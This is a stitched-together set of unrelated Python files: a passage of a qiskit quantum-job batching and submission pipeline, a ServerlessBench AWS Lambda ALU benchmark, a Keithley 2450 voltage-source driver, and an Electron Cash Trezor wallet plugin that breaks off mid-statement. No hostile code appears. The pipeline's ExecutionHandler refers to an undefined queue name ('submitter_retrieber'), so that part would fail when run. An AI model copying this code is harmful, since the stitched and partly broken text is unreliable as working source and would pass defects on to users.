n_jobs = min([len(self._jobs_to_transpile[backend_name]), self._backend_look_up.max_experiments(backend_name), self._max_transpile_batch_size])
self._log.debug(f"Prepared {n_jobs} circuits for the transpilation for backend {backend_name}")
jobs = self._jobs_to_transpile[backend_name][:n_jobs]
self._jobs_to_transpile[backend_name] = self._jobs_to_transpile[backend_name][n_jobs:]
self._pending.put((backend_name, jobs))
self._pending_transpilation[backend_name] = True
if len(self._jobs_to_transpile[backend_name]) > 0:
self._timers[backend_name] = time.time()
return True
def _add_job(self, job:QuantumExecutionJob):
"""Add an incoming job to the internal data structure in order to transpile it for the given backend.
Checks if there are enough jobs to create a full transpilation batch.
Args:
job (QuantumExecutionJob): job to transpile
"""
backend_name = job.backend_data.name
try:
self._jobs_to_transpile[backend_name].append(job)
except KeyError:
self._jobs_to_transpile[backend_name] = [job]
if not backend_name in self._timers.keys():
self._timers[backend_name] = time.time()
if len(self._jobs_to_transpile[backend_name]) == self._backend_look_up.max_experiments(backend_name):
# Todo try to cancel
if self._create_transpilation_batch(backend_name):
self._timers.pop(backend_name)
def _check_timers(self):
"""Check the timers. If an timeout occurs, try to create a transpilation batch.
"""
timers_to_clear = []
for backend_name in self._timers.keys():
time_diff = time.time() - self._timers[backend_name]
if time_diff > self._timeout:
if self._create_transpilation_batch(backend_name):
self._log.debug(f"Transpilation timeout for backend {backend_name}: {time_diff}s")
timers_to_clear.append(backend_name)
for backend_name in timers_to_clear:
self._timers.pop(backend_name)
if len(self._jobs_to_transpile[backend_name]) > 0:
# start a new timer
self._timers[backend_name] = time.time()
def _any_pending_transpilation(self) -> bool:
"""
Returns:
bool: True if there are any pending transpilation batches
"""
if len(self._pending_transpilation) == 0:
return False
else:
return any(self._pending_transpilation.values())
def _route_job(self):
"""Function that processes incoming jobs, periodically chechs the timers, and forwards transpiled jobs to the output
"""
while True:
for i in range(1000):
try:
timeout = 0.1
if i == 0:
timeout = 1
# block with a longer timeout only in the first iteration
job = self._input.get(timeout=timeout)
self._add_job(job)
except Empty:
break
if not self._any_pending_transpilation():
self._check_timers()
try:
backend_name, transpiled_result = self._finished.get(block=False)
self._pending_transpilation[backend_name] = False
for transpiled_tuple in transpiled_result:
self._output.put(transpiled_tuple)
self._check_timers()
except Empty:
pass
class Batch():
'''A batch represents a job on a backend. It can contain multiple experiments.'''
def __init__(self, backend_name:str, max_shots: int, max_experiments: int, batch_number:int):
self._log = logger.get_logger(type(self).__name__)
self.backend_name = backend_name
self.max_shots = max_shots
self.shots = 0
self.max_experiments = max_experiments
self.experiments = []
self.remaining_experiments = max_experiments
self.n_circuits = 0
self.batch_number = batch_number
def add_circuit(self, key, circuit:QuantumCircuit, shots:int) -> int:
"""Add a circuit to the Batch.
Args:
key (Any): Identifier for the circuit
circuit (QuantumCircuit): The circuit, which should be executed
shots (int): The number of shots
Returns:
int: remaining shots. If they are 0, all shots are executed
"""
if self.remaining_experiments == 0:
return shots
self.n_circuits += 1
reps = math.ceil(shots/self.max_shots)
self.shots = max(self.shots, min(shots, self.max_shots))
if reps <= self.remaining_experiments:
remaining_shots = 0
else:
reps = self.remaining_experiments
remaining_shots = shots - reps*self.max_shots
self.remaining_experiments -= reps
self.experiments.append({"key":key, "circuit":circuit, "reps":reps, "shots":shots-remaining_shots, "total_shots":shots})
return remaining_shots
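# Worked example with assumed numbers (max_shots=8192, 20000 requested shots): add_circuit
# computes reps = ceil(20000 / 8192) = 3, so the circuit is queued 3 times at up to 8192
# shots each and 0 shots remain. If only 2 experiment slots were left in the batch, reps
# would be capped at 2 and 20000 - 2 * 8192 = 3616 shots would spill into the next batch
# (surplus shots from a full batch are trimmed later by ResultProcessor).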
class Batcher(Thread):
def __init__(self, input:Queue, output: Queue, quantum_job_table:Dict, backend_look_up:BackendLookUp, batch_timeout:int=30) -> None:
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._batch_timeout = batch_timeout
self._quantum_job_table = quantum_job_table
self._backend_look_up = backend_look_up
self._batch_timers = {}
self._batch_count = {}
self._batches = {}
Thread.__init__(self)
self._log.info("Init")
def _get_or_create_batch(self, backend_name:str):
try:
batch = self._batches[backend_name]
if batch.remaining_experiments == 0:
batch = self._create_new_batch(backend_name)
except KeyError:
batch = Batch(backend_name, self._backend_look_up.max_shots(backend_name), self._backend_look_up.max_experiments(backend_name), 0)
self._batches[backend_name] = batch
self._batch_count[backend_name] = 0
return batch
def _create_new_batch(self, backend_name:str):
self._batch_count[backend_name] += 1
batch = Batch(backend_name, self._backend_look_up.max_shots(backend_name), self._backend_look_up.max_experiments(backend_name), self._batch_count[backend_name])
self._batches[backend_name] = batch
return batch
def _add_to_batch(self, transpiled_circuit:QuantumCircuit, job:QuantumExecutionJob):
"""Add the circuit to the batch. Automatically forwards full batches and creates new batches.
Args:
transpiled_circuit (QuantumCircuit)
job (QuantumExecutionJob): corresponding job to the transpiled circuit containing the shot number and the backend
"""
backend_name = job.backend_data.name
if not backend_name in self._batch_timers.keys():
self._batch_timers[backend_name] = time.time()
key = job.id
remaining_shots = job.shots
while remaining_shots > 0:
batch = self._get_or_create_batch(backend_name)
remaining_shots = batch.add_circuit(key, transpiled_circuit, remaining_shots)
if batch.remaining_experiments == 0:
self._log.info(f"Generated full batch {backend_name}/{self._batch_count[backend_name]}")
self._output.put(batch)
if remaining_shots > 0:
self._batch_timers[backend_name] = time.time()
else:
self._batch_timers.pop(backend_name)
def _check_timers(self):
"""Checks if an timeout occured for a batch and then forward it.
"""
timers_to_clear = []
for backend_name in self._batch_timers.keys():
time_diff = time.time() - self._batch_timers[backend_name]
if time_diff > self._batch_timeout:
batch = self._batches[backend_name]
self._log.debug(f"Timeout for batch {backend_name}/{self._batch_count[backend_name]}, Time passed: {time_diff}, batch_size:{batch.max_experiments - batch.remaining_experiments}, max batch size {batch.max_experiments}")
self._output.put(batch)
self._create_new_batch(backend_name)
timers_to_clear.append(backend_name)
for backend_name in timers_to_clear:
self._batch_timers.pop(backend_name)
def run(self) -> None:
self._log.info("Started")
while True:
try:
transpiled_circ, job = self._input.get(timeout=5)
self._quantum_job_table[job.id] = job
self._add_to_batch(transpiled_circ, job)
except Empty:
pass
self._check_timers()
class Submitter(Thread):
def __init__(self, input: Queue, output: Queue, backend_look_up:BackendLookUp, backend_control:BackendControl, defer_interval=60):
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._backend_look_up = backend_look_up
self._backend_control = backend_control
self._defer_interval = defer_interval
self._internal_jobs_queue = []
Thread.__init__(self)
self._log.info("Init")
def _assemble(self, batch:Batch) -> Qobj:
"""Assemble a Qobj from a Batch.
Args:
batch (Batch)
Returns:
Qobj
"""
backend_name = batch.backend_name
backend = self._backend_look_up.get(backend_name)
circuits = list([circuit_item["circuit"] for circuit_item in batch.experiments])
multiplied_circuits = []
for i, circuit_item in enumerate(batch.experiments):
reps = circuit_item["reps"]
circ = circuits[i]
multiplied_circuits.extend([circ]*reps)
#self._log.info(f"Transpiled batch {backend_name}/{batch.batch_number}")
qobj = assemble(multiplied_circuits, backend, shots=batch.shots, memory=True)
self._log.info(f"Assembled Qobj for batch {backend_name}/{batch.batch_number}")
return qobj
def run(self) -> None:
self._log.info("Started")
batch: Batch
qobj: Qobj
submit_interval = 30
last_time = 0
while True:
try:
batch = self._input.get(timeout=self._defer_interval)
qobj = self._assemble(batch)
self._internal_jobs_queue.append((batch, qobj))
except Empty:
pass
current = time.time()
if current - last_time > submit_interval:
deferred_jobs = []
for batch, qobj in self._internal_jobs_queue:
backend_name = batch.backend_name
backend = self._backend_look_up.get(backend_name)
if self._backend_control.try_to_enter(backend_name, backend):
job = backend.run(qobj)
self._log.info(f"Submitted batch {batch.backend_name}/{batch.batch_number}")
self._output.put((batch, job))
else:
# self._log.debug(f"Reached limit of queued jobs for backend {backend_name} -> defer job for batch {batch.batch_number}")
deferred_jobs.append((batch, qobj))
self._internal_jobs_queue = deferred_jobs
last_time = time.time()
class Retriever(Thread):
def __init__(self, input: Queue, output: Queue, wait_time:float, backend_control:BackendControl):
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._wait_time = wait_time
self._backend_control = backend_control
self._jobs = []
self._batch_counter = {}
self._deferred_results = {}
Thread.__init__(self)
self._log.info("Init")
def run(self):
self._log.info("Started")
batch: Batch
job: Job
while True:
i = 0
while not self._input.empty() and i < 5:
job_tuple = self._input.get()
self._jobs.append(job_tuple)
i += 1
final_state_jobs = []
for batch, job in self._jobs:
try:
if job.in_final_state():
final_state_jobs.append((batch, job))
self._backend_control.leave(batch.backend_name)
except qiskit.providers.ibmq.job.exceptions.IBMQJobApiError as e:
self._log.info("Connection Problem")
for job_tuple in final_state_jobs:
self._jobs.remove(job_tuple)
batch, job = job_tuple
self._log.info(f"Received result for batch {batch.backend_name}/{batch.batch_number}")
try:
batch_counter = self._batch_counter[batch.backend_name]
except KeyError:
batch_counter = 0
self._batch_counter[batch.backend_name] = 0
self._deferred_results[batch.backend_name] = []
if batch_counter == batch.batch_number:
# the received batch is the next batch -> output it
batch_counter += 1
self._output.put(job_tuple)
# check if deferred results can be output
if len(self._deferred_results[batch.backend_name]) > 0:
# sort the deferred job tuples according to their batch number
self._deferred_results[batch.backend_name].sort(key=lambda tuple:tuple[0].batch_number)
while len(self._deferred_results[batch.backend_name]) > 0 and batch_counter == self._deferred_results[batch.backend_name][0][0].batch_number:
# output jobs as long as there are deferred jobs and the batch number is the next expected number
self._output.put(self._deferred_results[batch.backend_name].pop(0))
batch_counter += 1
self._batch_counter[batch.backend_name] = batch_counter
else:
# the received batch is not the next batch
self._deferred_results[batch.backend_name].append(job_tuple)
self._log.info(f"Deferred result for batch {batch.backend_name}/{batch.batch_number} to establish order")
time.sleep(self._wait_time)
class ResultProcessor(Thread):
def __init__(self, input: Queue, output: Queue, quantum_job_table:Dict, memory:bool=False):
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._quantum_job_table = quantum_job_table
self._memory = memory
self._previous_key = {}
self._previous_memory = {}
self._previous_counts = {}
Thread.__init__(self)
self._log.info("Init")
def _add_dicts(self, d1, d2):
c = Counter(d1)
c.update(d2)
return dict(c)
def _process_job_result(self, job_result:Result, batch:Batch) -> Dict[str, Result]:
"""Post-process the job result corresponding to a batch. Recreate the single results by adding up the shots of multiple executions
Args:
job_result (Result)
batch (Batch): corresponding batch to the job_result
Returns:
Dict[str, Result]: Maps the keys of the initial QuantumExecutionJobs to their Results
"""
results = {}
exp_number = 0
# get the Result as dict and delete the results
result_dict = job_result.to_dict()
index = batch.batch_number
backend_name = batch.backend_name
try:
previous_key = self._previous_key[backend_name]
previous_memory = self._previous_memory[backend_name]
previous_counts = self._previous_counts[backend_name]
except KeyError:
previous_key = None
previous_memory = None
previous_counts = None
self._log.info(f"Process result of job {index}")
for exp in batch.experiments:
key = exp["key"]
circ = exp["circuit"]
reps = exp["reps"]
shots = exp["shots"]
total_shots = exp["total_shots"]
memory = []
counts = {}
result_data = None
if previous_memory:
# there is data from the previous job
assert(previous_key==key)
memory.extend(previous_memory)
counts.update(previous_counts)
shots += len(previous_memory)
total_shots += len(previous_memory)
previous_memory = None
previous_counts = None
previous_key = None
# get ExperimentResult as dict
job_exp_result_dict = job_result._get_experiment(exp_number).to_dict()
if not (shots == total_shots and reps == 1 and len(memory) == 0):
# do not run this block if it is only one experiment (shots == total_shots) with one repetition and no previous data is available
for exp_index in range(exp_number, exp_number+reps):
mem = job_result.data(exp_index)['memory']
memory.extend(mem)
cnts = job_result.data(exp_index)['counts']
if exp_index == exp_number+reps-1 and shots == total_shots:
# last experiment for this circuit
if len(memory) > total_shots:
# trim memory and counts w.r.t. number of shots
too_much = len(memory) - total_shots
memory = memory[:total_shots]
mem = mem[:-too_much]
cnts = dict(Counter(mem))
counts = self._add_dicts(counts, cnts)
if shots < total_shots:
previous_memory = copy.deepcopy(memory)
previous_counts = copy.deepcopy(counts)
previous_key = key
continue
if self._memory:
result_data = ExperimentResultData(counts=counts, memory=memory).to_dict()
else:
result_data = ExperimentResultData(counts=counts).to_dict()
# overwrite the data and the shots
job_exp_result_dict["data"] = result_data
job_exp_result_dict["shots"] = total_shots
else:
if not self._memory:
counts = job_result.data(exp_number)['counts']
result_data = ExperimentResultData(counts=counts).to_dict()
job_exp_result_dict["data"] = result_data
# overwrite the results with the computed result
result_dict["results"] = [job_exp_result_dict]
results[key] = Result.from_dict(result_dict)
exp_number += reps
self._previous_key[backend_name] = previous_key
self._previous_memory[backend_name] = previous_memory
self._previous_counts[backend_name] = previous_counts
return results
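# Numeric illustration of the trimming above (assumed values): a circuit with
# total_shots=20000 executed as 3 repetitions of 8192 shots returns 24576 memory entries;
# too_much = 24576 - 20000 = 4576, so the memory is cut back to exactly 20000 entries,
# the last repetition's counts are rebuilt from its trimmed memory, and the merged counts
# and shots are written back into the experiment's result data.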
def run(self) -> None:
self._log.info("Started")
batch: Batch
job: Job
while True:
batch, job = self._input.get()
job_result = job.result()
self._log.info(f"Got result for batch {batch.batch_number} from {batch.backend_name}")
result_for_batch = self._process_job_result(job_result, batch)
for key, result in result_for_batch.items():
try:
qjob = self._quantum_job_table.pop(key)
qjob.result = result
self._output.put(qjob)
except KeyError as ke:
# TODO Exception Handling
raise ke
class ExecutionHandler():
def __init__(self, provider:AccountProvider, input:Queue, output:Queue, batch_timeout:int = 60, retrieve_interval:int = 30, transpile_timeout=20, max_transpile_batch_size=float('inf'), submitter_defer_interval=30, provide_memory:bool=False) -> None:
transpiler_batcher = Queue()
batcher_submitter = Queue()
submitter_retriever = Queue()
retriever_processor = Queue()
quantum_job_table = {}
backend_look_up = BackendLookUp(provider)
backend_control = BackendControl()
self._transpiler = Transpiler(input=input, output=transpiler_batcher, backend_look_up=backend_look_up, timeout = transpile_timeout, max_transpile_batch_size=max_transpile_batch_size)
self._batcher = Batcher(input=transpiler_batcher, output=batcher_submitter, quantum_job_table=quantum_job_table, backend_look_up=backend_look_up, batch_timeout=batch_timeout)
self._submitter = Submitter(input=batcher_submitter, output=submitter_retrieber, backend_look_up=backend_look_up, backend_control=backend_control, defer_interval=submitter_defer_interval)
self._retriever = Retriever(input=submitter_retrieber, output=retriever_processor, wait_time=retrieve_interval, backend_control=backend_control)
self._processor = ResultProcessor(input=retriever_processor, output=output, quantum_job_table=quantum_job_table, memory=provide_memory)
def start(self):
self._transpiler.start()
self._batcher.start()
self._submitter.start()
self._retriever.start()
self._processor.start()
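# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module). It shows how the pipeline
# above might be wired together; the provider call, the job object placed on
# the input queue, and its attributes are assumptions based on the classes in
# this file, not a verified API.
#
#   from queue import Queue
#   from qiskit import IBMQ
#
#   provider = IBMQ.load_account()
#   input_queue, output_queue = Queue(), Queue()
#   handler = ExecutionHandler(provider, input=input_queue, output=output_queue,
#                              batch_timeout=60, retrieve_interval=30)
#   handler.start()                  # spawns Transpiler/Batcher/Submitter/Retriever/ResultProcessor
#   input_queue.put(my_quantum_job)  # hypothetical job object consumed by the Transpiler
#   finished = output_queue.get()    # the same job, now carrying a qiskit Result
# ---------------------------------------------------------------------------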
|
together.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import boto3
import time
import os
import random
from multiprocessing import Process, Pipe
bucketName = "resource-efficient"
defaultKey = "loopTime.txt"
defaultLoopTime = 10000000
defaultParallelIndex = 100
def lambda_handler(event, context):
startTime = GetTime()
if 'key' in event:
key = event['key']
else:
key = defaultKey
download_file(key)
loopTime = extractLoopTime(key)
retTime = GetTime()
result1 = {
"startTime": startTime,
"retTime": retTime,
"execTime": retTime - startTime,
"loopTime": loopTime,
"key": key
}
return alu_handler(result1,"")
def download_file(key):
filepath = "/tmp/%s" %key
s3 = boto3.client('s3')
with open(filepath, 'wb+') as f:
s3.download_fileobj(bucketName, key, f)
def extractLoopTime(key):
filepath = "/tmp/%s" %key
txtfile = open(filepath, 'r')
loopTime = int(txtfile.readline())
print("loopTime: " + str(loopTime))
txtfile.close()
return loopTime
def alu_handler(event, context):
startTime = GetTime()
if 'execTime' in event:
execTime_prev = event['execTime']
else:
execTime_prev = 0
if 'loopTime' in event:
loopTime = event['loopTime']
else:
loopTime = defaultLoopTime
parallelIndex = defaultParallelIndex
temp = alu(loopTime, parallelIndex)
retTime = GetTime()
return {
"startTime": startTime,
"retTime": retTime,
"execTime": retTime - startTime,
"result": temp,
'execTime_prev': execTime_prev
}
def doAlu(times, childConn, clientId):
a = random.randint(10, 100)
b = random.randint(10, 100)
temp = 0
for i in range(times):
if i % 4 == 0:
temp = a + b
elif i % 4 == 1:
temp = a - b
elif i % 4 == 2:
temp = a * b
else:
temp = a / b
print(times)
childConn.send(temp)
childConn.close()
return temp
def alu(times, parallelIndex):
per_times = int(times / parallelIndex)
threads = []
childConns = []
parentConns = []
for i in range(parallelIndex):
parentConn, childConn = Pipe()
parentConns.append(parentConn)
childConns.append(childConn)
t = Process(target=doAlu, args=(per_times, childConn, i))
threads.append(t)
for i in range(parallelIndex):
threads[i].start()
for i in range(parallelIndex):
threads[i].join()
results = []
for i in range(parallelIndex):
results.append(parentConns[i].recv())
return str(results)
def GetTime():
return int(round(time.time() * 1000))
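# Local smoke test (illustrative only, not part of the deployed Lambda): it runs
# just the ALU stage with a small loop count and skips the S3 download. Note
# that alu() always spawns `defaultParallelIndex` worker processes.
if __name__ == '__main__':
    fake_event = {"loopTime": 1000000, "execTime": 0}
    print(alu_handler(fake_event, None))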
|
Keithley2450.py
|
from math import copysign
from threading import Thread
from time import sleep
from typing import List, Tuple
import pyvisa
from IVTracerVlockin import BiasGenerator
class Driver:
"""Keithley 2450 as bias generator."""
def __init__(self, address):
self._rm = rm = pyvisa.ResourceManager()
self._rsc = rsc = rm.open_resource(
address, write_termination="\n", read_termination="\n"
)
self._ramps = []
if rsc.query(":SOUR:FUNC?") != "VOLT":
raise RuntimeError(f"Keithley 2450 ({address}) is not in voltage mode.")
if rsc.query(":OUTP?") != "1":
raise RuntimeError(f"Keithley 2450 ({address}) output is off.")
self._worker_thread = None
def close(self):
self._rsc.close()
def select_range(self, value, load_resistance):
if value < 21e-3:
r = 20e-3
elif value < 210e-3:
r = 200e-3
elif value < 2.1:
r = 2
elif value < 21:
r = 20
elif value < 210:
r = 200
else:
raise ValueError(f"No admissible range for {value}")
resp = self._rsc.query(f":SOUR:VOLT:RANG {r};:SOUR:VOLT:RANG?")
if float(resp) != r:
raise RuntimeError(
f"Failed to set range (after setting value is {resp}," f"expected {r}"
)
curr_limit = round(1.1 * r / load_resistance, 6)
resp = self._rsc.query(
f":SENS:CURR:RANG:AUTO 1;:SOUR:VOLT:ILIMIT {curr_limit};:SOUR:VOLT:ILIMIT?"
)
if float(resp) != curr_limit:
raise RuntimeError(
f"Failed to set current limit (after setting value is {resp},"
f"expected {curr_limit}"
)
def current_value(self):
"""Get the current value of the output."""
return float(self._rsc.query(":SOUR:VOLT?"))
def goto_value(self, value, slope):
"""Go to the specified value immediately."""
rsc = self._rsc
curr_value = self.current_value()
step = slope * 0.05
step = copysign(step, value - curr_value)
        if abs(value - curr_value) < abs(step):  # step is signed; compare magnitudes
rsc.write(f":SOUR:VOLT {value}")
else:
self._worker_thread = Thread(target=self._go_to, args=(value, step))
self._worker_thread.start()
sleep(0.02)
def is_ramping(self):
"""Check is the program is done executing."""
if self._worker_thread is not None and self._worker_thread.is_alive():
return True
else:
return False
def get_admissible_reset_rate(self, reset_rate, amplitude):
"""Get an admissible reset rate.
        This avoids issues when the requested reset would be too fast for the system to handle.
"""
return reset_rate
@classmethod
    def support_continuous_sweeping(cls) -> bool:
        """Indicate whether this driver supports continuous sweeping."""
return False
def _go_to(self, value, step):
rsc = self._rsc
cval = self.current_value()
while abs(value - cval) > abs(step):
rsc.write(f":SOUR:VOLT {cval + step}")
sleep(0.05)
cval = self.current_value()
rsc.write(f":SOUR:VOLT {value}")
# Can be used for debugging by commenting out the import of BiasGenerator
# if __name__ == "__main__":
# y = Driver("GPIB::13::INSTR")
# try:
# print(y.is_ramping())
# y.goto_value(-1, 10)
# finally:
# y.close()
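# Worked example of the ramp logic above (numbers only, nothing is executed):
# starting from 0 V, goto_value(1.0, slope=0.1) computes step = 0.1 * 0.05 = 0.005 V.
# Because |1.0 - 0.0| exceeds one step, _go_to runs in a worker thread, writing
# 0.005 V increments roughly every 50 ms (about 0.1 V/s), and writes the 1.0 V
# target directly once the remaining gap is smaller than one step.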
|
trezor.py
|
from binascii import hexlify, unhexlify
from collections import defaultdict
import traceback
import sys
from electroncash.util import bfh, bh2u, versiontuple, UserCancelled
from electroncash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, SignatureType)
from electroncash.i18n import _
from electroncash.networks import NetworkConstants
from electroncash.plugins import BasePlugin, Device
from electroncash.transaction import deserialize
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electroncash.address import ScriptOutput
from ..hw_wallet import HW_PluginBase
try:
import trezorlib
import trezorlib.transport
from .clientbase import (TrezorClientBase, parse_path)
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
import traceback
traceback.print_exc()
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
PASSPHRASE_ON_DEVICE = object()
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password, sigtype=SignatureType.BITCOIN):
if sigtype == SignatureType.ECASH:
raise RuntimeError(
_('eCash message signing is not available for {}').format(self.device)
)
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password, *, use_cache=False):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise RuntimeError(_('Offline signing with {} is not supported.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
def needs_prevtx(self):
# Trezor does need previous transactions for Bitcoin Cash
return True
class LibraryFoundButUnusable(Exception):
def __init__(self, library_version='unknown'):
self.library_version = library_version
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 12, 0)
maximum_library = (0, 13)
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def check_libraries_available(self) -> bool:
def version_str(t):
return ".".join(str(i) for i in t)
try:
# this might raise ImportError or LibraryFoundButUnusable
library_version = self.get_library_version()
# if no exception so far, we might still raise LibraryFoundButUnusable
if (library_version == 'unknown'
or versiontuple(library_version) < self.minimum_library
or hasattr(self, "maximum_library") and versiontuple(library_version) >= self.maximum_library):
raise LibraryFoundButUnusable(library_version=library_version)
except ImportError:
return False
except LibraryFoundButUnusable as e:
library_version = e.library_version
max_version_str = version_str(self.maximum_library) if hasattr(self, "maximum_library") else "inf"
self.libraries_available_message = (
_("Library version for '{}' is incompatible.").format(self.name)
+ '\nInstalled: {}, Needed: {} <= x < {}'
.format(library_version, version_str(self.minimum_library), max_version_str))
self.print_stderr(self.libraries_available_message)
return False
return True
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0)
for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
# Note: testnet supported only by unofficial firmware
return "Bcash Testnet" if NetworkConstants.TESTNET else "Bcash"
def _chk_settings_do_popup_maybe(self, handler, method, model, settings):
recovery_type = settings and settings[-1]
if (method == TIM_RECOVER
and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS
and model != 'T'): # I'm pretty sure this only applies to the '1' not the 'T'
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"Either method is secure since no secret information "
"will be entered into your computer."
).format(self.device)
choices = [
# Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
loops = [wizard.loop] # We do it this way so as to pop the loop when it's done. This avoids possible multiple calls to loop.exit from different code paths.
handler._loops = loops # hack to prevent trezor transport errors from stalling the UI here. see clientbase.py button_request which aborts the wizard event loop on transport error
try:
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
# We do this popup business here because doing it in the
# thread interferes with whatever other popups may happen
# from trezorlib. So we do this all-stop popup first if needed.
self._chk_settings_do_popup_maybe(handler, method, model, settings)
errors = []
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, loops, errors))
                t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
loops.pop()
if exit_code != 0:
if errors and isinstance(errors[0], BaseException):
msg = str(errors[0]).strip()
if msg:
# we do this here in the main thread so as to give
# the user the opportunity to actually *see* the error
# window before the wizard "goes back"
handler.show_error(msg)
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
finally:
delattr(handler, '_loops') # /clean up hack
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, loops, errors):
exit_code = 0
try:
self._initialize_device(settings, method, device_id)
except UserCancelled:
exit_code = 2
except BaseException as e:
traceback.print_exc(file=sys.stderr)
errors.append(e)
exit_code = 1
finally:
l = loops.copy() # leverage the GIL here for thread safety.
if l:
l[0].exit(exit_code)
def _initialize_device(self, settings, method, device_id):
item, label, pin_protection, passphrase_protection, recovery_type = settings
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
client.reset_device(
strength=64 * (item + 2), # 128, 192 or 256
passphrase_protection=passphrase_protection,
pin_protection=pin_protection,
label=label)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=recovery_type,
word_count=6 * (item + 2), # 12, 18 or 24
passphrase_protection=passphrase_protection,
pin_protection=pin_protection,
label=label)
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
'''Called when creating a new wallet. Select the device to use. If
        the device is uninitialized, go through the initialization
process.'''
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(
device_id=device_id, wizard=wizard
)
if not client.is_uptodate():
raise Exception(_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
